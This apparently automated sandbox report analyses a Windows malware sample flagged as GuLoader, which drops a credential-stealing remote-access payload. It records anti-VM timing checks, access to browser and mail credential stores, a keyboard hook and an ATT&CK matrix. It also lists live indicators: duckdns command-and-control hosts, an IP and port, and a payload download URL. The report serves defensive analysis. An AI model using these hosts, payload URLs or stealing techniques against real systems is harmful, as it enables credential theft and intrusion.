              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeRDTSC instruction interceptor: First address: 5557A91 second address: 5557A91 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DE0C08E9Fh 0x00000008 test dh, FFFFFFC9h 0x0000000b inc ebp 0x0000000c cmp edx, 39CF390Dh 0x00000012 inc ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeRDTSC instruction interceptor: First address: 20F7A91 second address: 20F7A91 instructions: 0x00000000 rdtsc 0x00000002 cmp eax, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DE0D0E32Fh 0x00000008 test dh, FFFFFFC9h 0x0000000b inc ebp 0x0000000c cmp edx, 39CF390Dh 0x00000012 inc ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI coverage: 4.6 %
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe TID: 4916Thread sleep count: 44 > 30Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_0040646B FindFirstFileA,FindClose,4_2_0040646B
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004058BF
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_368510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_368510F1
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407898
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_00418981 memset,GetSystemInfo,6_2_00418981
              Source: z120X20SO__UK__EKMELAMA.exe, 00000000.00000002.2277039164.0000000000764000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\K
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054EE000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.0000000005498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv9ED5.tmp.6.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: bhv9ED5.tmp.6.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI call chain: ExitProcess graph end nodegraph_0-4155
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI call chain: ExitProcess graph end nodegraph_0-3978
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeAPI call chain: ExitProcess graph end nodegraph_7-33884
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36852639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_36852639
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_6F951A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F951A98
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36854AB4 mov eax, dword ptr fs:[00000030h]4_2_36854AB4
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_3685724E GetProcessHeap,4_2_3685724E
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36852639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_36852639
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36852B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_36852B1C
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_368560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_368560E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: NULL target: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: NULL target: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeSection loaded: NULL target: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\ncfbreymgdrzyrcdisjodicyn"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\qekmsxigulkljfqhsveponxhojry"Jump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeProcess created: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe /stext "C:\Users\user\AppData\Local\Temp\aypetpthqtcqlmmtjgrrrasywyazfan"Jump to behavior
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerpu
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLl
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager15632187
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2813652068.0000000005502000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmp, kaourts.dat.4.drBinary or memory string: [2024/11/05 04:03:29 Program Manager]
              Source: z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916477597.0000000005502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36852933 cpuid 4_2_36852933
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 4_2_36852264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_36852264
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 7_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,7_2_004082CD
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kaourts.dat, type: DROPPED
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: ESMTPPassword7_2_004033F0
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword7_2_00402DB3
              Source: C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword7_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 2640, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: z120X20SO__UK__EKMELAMA.exe PID: 5500, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kaourts.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              213
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets231
              Security Software Discovery
              SSH2
              Clipboard Data
              Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection
              Proc Filesystem1
              System Owner/User Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549086 Sample: z120X20SO__UK__EKMELAMA.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 30 gerfourt99lahjou1.duckdns.org 2->30 32 kinltd.top 2->32 34 geoplugin.net 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Yara detected GuLoader 2->52 56 5 other signatures 2->56 8 z120X20SO__UK__EKMELAMA.exe 32 2->8         started        signatures3 54 Uses dynamic DNS services 30->54 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 58 Detected unpacking (changes PE section rights) 8->58 60 Tries to steal Mail credentials (via file registry) 8->60 62 Tries to detect virtualization through RDTSC time measurements 8->62 64 Switches to a custom stack to bypass stack traces 8->64 12 z120X20SO__UK__EKMELAMA.exe 4 16 8->12         started        signatures6 process7 dnsIp8 36 gerfourt99lahjou1.duckdns.org 172.111.244.132, 3487, 49893, 49900 M247GB United States 12->36 38 kinltd.top 104.21.24.17, 443, 49866, 49868 CLOUDFLARENETUS United States 12->38 40 geoplugin.net 178.237.33.50, 49901, 80 ATOM86-ASATOM86NL Netherlands 12->40 26 C:\Users\user\AppData\...\Tabelopstninger.exe, PE32 12->26 dropped 28 C:\Users\user\AppData\Roaming\kaourts.dat, data 12->28 dropped 66 Maps a DLL or memory area into another process 12->66 68 Installs a global keyboard hook 12->68 17 z120X20SO__UK__EKMELAMA.exe 1 12->17         started        20 z120X20SO__UK__EKMELAMA.exe 1 12->20         started        22 z120X20SO__UK__EKMELAMA.exe 2 12->22         started        file9 signatures10 process11 signatures12 42 Tries to steal Instant Messenger accounts or passwords 17->42 44 Tries to harvest and steal browser information (history, passwords, etc) 17->44 46 Tries to steal Mail credentials (via file / registry access) 20->46

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              z120X20SO__UK__EKMELAMA.exe5%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Melosa\Tabelopstninger.exe5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              gerfourt99lahjou2.duckdns.org0%Avira URL Cloudsafe
              gerfourt99lahjou1.duckdns.org0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              kinltd.top
              104.21.24.17
              truefalse
                high
                gerfourt99lahjou1.duckdns.org
                172.111.244.132
                truetrue
                  unknown
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://kinltd.top/xeInzY158.binfalse
                      high
                      http://kinltd.top/xeInzY158.binfalse
                        high
                        http://geoplugin.net/json.gpfalse
                          high
                          gerfourt99lahjou1.duckdns.orgtrue
                          • Avira URL Cloud: safe
                          unknown
                          gerfourt99lahjou2.duckdns.orgtrue
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.imvu.comrz120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935846191.0000000036820000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            high
                            https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv9ED5.tmp.6.drfalse
                              high
                              https://kinltd.top/z120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.0000000005498000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.imvu.comtaz120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595387995.000000000056D000.00000004.00000020.00020000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000003.2595293786.000000000056D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv9ED5.tmp.6.drfalse
                                    high
                                    https://aefd.nelreports.net/api/report?cat=bingthbhv9ED5.tmp.6.drfalse
                                      high
                                      http://geoplugin.net/jz120X20SO__UK__EKMELAMA.exe, 00000004.00000003.2583060102.0000000005500000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv9ED5.tmp.6.drfalse
                                          high
                                          http://www.nirsoft.netz120X20SO__UK__EKMELAMA.exe, 00000006.00000002.2609250206.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                            high
                                            https://aefd.nelreports.net/api/report?cat=bingaotakbhv9ED5.tmp.6.drfalse
                                              high
                                              https://deff.nelreports.net/api/report?cat=msnbhv9ED5.tmp.6.drfalse
                                                high
                                                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv9ED5.tmp.6.drfalse
                                                  high
                                                  https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv9ED5.tmp.6.drfalse
                                                    high
                                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv9ED5.tmp.6.drfalse
                                                      high
                                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comz120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2935846191.0000000036820000.00000040.10000000.00040000.00000000.sdmp, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv9ED5.tmp.6.drfalse
                                                          high
                                                          https://kinltd.top/xeInzY158.binraz120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.comz120X20SO__UK__EKMELAMA.exe, z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv9ED5.tmp.6.drfalse
                                                                high
                                                                http://geoplugin.net/json.gpHz120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://geoplugin.net/json.gpLz120X20SO__UK__EKMELAMA.exe, 00000004.00000002.2916398942.00000000054D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://maps.windows.com/windows-app-web-linkbhv9ED5.tmp.6.drfalse
                                                                      high
                                                                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv9ED5.tmp.6.drfalse
                                                                        high
                                                                        https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv9ED5.tmp.6.drfalse
                                                                          high
                                                                          https://login.yahoo.com/config/loginz120X20SO__UK__EKMELAMA.exefalse
                                                                            high
                                                                            http://www.nirsoft.net/z120X20SO__UK__EKMELAMA.exe, 00000008.00000002.2595640128.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv9ED5.tmp.6.drfalse
                                                                                high
                                                                                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv9ED5.tmp.6.drfalse
                                                                                  high
                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv9ED5.tmp.6.drfalse
                                                                                    high
                                                                                    https://www.office.com/bhv9ED5.tmp.6.drfalse
                                                                                      high
                                                                                      https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv9ED5.tmp.6.drfalse
                                                                                        high
